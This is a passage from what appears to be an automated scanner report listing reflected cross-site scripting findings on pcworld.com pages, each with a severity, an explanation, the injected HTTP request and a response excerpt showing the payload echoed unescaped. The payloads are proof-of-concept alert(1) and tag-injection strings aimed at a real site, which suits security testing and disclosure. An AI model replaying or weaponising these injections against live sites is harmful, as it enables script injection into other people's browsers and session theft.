This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/security.htmlb07d6"><script>alert(1)</script>60b33eb97b4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E68B670A1E2293905CA8B69D2D4D5D84; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/security.htmlb07d6"><script>alert(1)</script>60b33eb97b4"/>
...[SNIP]...

1.61. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bde1'-alert(1)-'ce8c4f271bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/security.html6bde1'-alert(1)-'ce8c4f271bd HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C6A36236607C43AE5ED971C8654B1148; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:12 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security.html6bde1'-alert(1)-'ce8c4f271bd';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.62. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50827"><a>9ffa37c2904 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/security50827"><a>9ffa37c2904/viruses_phishing_spam.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/security50827"><a>9ffa37c2904/viruses_phishing_spam.html"/>
...[SNIP]...

1.63. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60071'-alert(1)-'e043a719796 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/security60071'-alert(1)-'e043a719796/viruses_phishing_spam.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:53 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:52 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security60071'-alert(1)-'e043a719796/viruses_phishing_spam.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.64. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49f47"><a>0c5ac57f090 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/security/viruses_phishing_spam.html49f47"><a>0c5ac57f090 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=23D6B93E082BEDB0434D8CB7DA78301B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/security/viruses_phishing_spam.html49f47"><a>0c5ac57f090"/>
...[SNIP]...

1.65. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security/viruses_phishing_spam.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8ba0'-alert(1)-'f7e1151c2f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/security/viruses_phishing_spam.htmld8ba0'-alert(1)-'f7e1151c2f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E80BB6AA0F0E6C464BA8546FE20DFD87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:55 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/security/viruses_phishing_spam.htmld8ba0'-alert(1)-'f7e1151c2f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.66. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25fc6"><script>alert(1)</script>1ad70c5c4d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/servers_storage.html25fc6"><script>alert(1)</script>1ad70c5c4d5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA35799E49E5803DDC07806B48EFAEC9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:39:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/servers_storage.html25fc6"><script>alert(1)</script>1ad70c5c4d5"/>
...[SNIP]...

1.67. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4755b'-alert(1)-'23b13dc335 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/servers_storage.html4755b'-alert(1)-'23b13dc335 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:39:45 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storage.html4755b'-alert(1)-'23b13dc335';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.68. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0cbc'-alert(1)-'4db9b3ccac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/servers_storagee0cbc'-alert(1)-'4db9b3ccac8/servers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=E8616940AC69F1295E07009B52A79533; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:52 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storagee0cbc'-alert(1)-'4db9b3ccac8/servers.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.l
...[SNIP]...

1.69. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d4bc"><a>9a31e8d991b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/servers_storage7d4bc"><a>9a31e8d991b/servers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:14 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B8B2B60C18785766E242EBDB11B9DADA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/servers_storage7d4bc"><a>9a31e8d991b/servers.html"/>
...[SNIP]...

1.70. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfb6d'-alert(1)-'b7f486c0673 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/servers_storage/servers.htmldfb6d'-alert(1)-'b7f486c0673 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C57F62B3D94B58686D3F5E1E5DDDA4F2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:50 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/servers_storage/servers.htmldfb6d'-alert(1)-'b7f486c0673';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.71. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/servers_storage/servers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6169e"><a>f03916e9453 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/servers_storage/servers.html6169e"><a>f03916e9453 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:38 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
isplay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/servers_storage/servers.html6169e"><a>f03916e9453"/>
...[SNIP]...

1.72. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e52"><script>alert(1)</script>69525ac23ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/software_services.html79e52"><script>alert(1)</script>69525ac23ea HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
yle="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/software_services.html79e52"><script>alert(1)</script>69525ac23ea"/>
...[SNIP]...

1.73. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c7a9'-alert(1)-'f2865b9c1a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/software_services.html9c7a9'-alert(1)-'f2865b9c1a4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D101BB4429A9D7FDD22B93443BD12646; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:54 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services.html9c7a9'-alert(1)-'f2865b9c1a4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.74. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33b3d'-alert(1)-'27aaef33dab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/software_services33b3d'-alert(1)-'27aaef33dab/productivity.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:45:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:06 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services33b3d'-alert(1)-'27aaef33dab/productivity.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.75. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab248"><a>ee150f52351 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/software_servicesab248"><a>ee150f52351/productivity.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=60ECAD47FFAD3FA27B70469BCF48201B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mg style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/software_servicesab248"><a>ee150f52351/productivity.html"/>
...[SNIP]...

1.76. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59799"><a>ffe7be870e9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/software_services/productivity.html59799"><a>ffe7be870e9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=459D110779AC2D7929705AA4E42D8A76; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/software_services/productivity.html59799"><a>ffe7be870e9"/>
...[SNIP]...

1.77. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/software_services/productivity.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 163f6'-alert(1)-'691e9d237e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

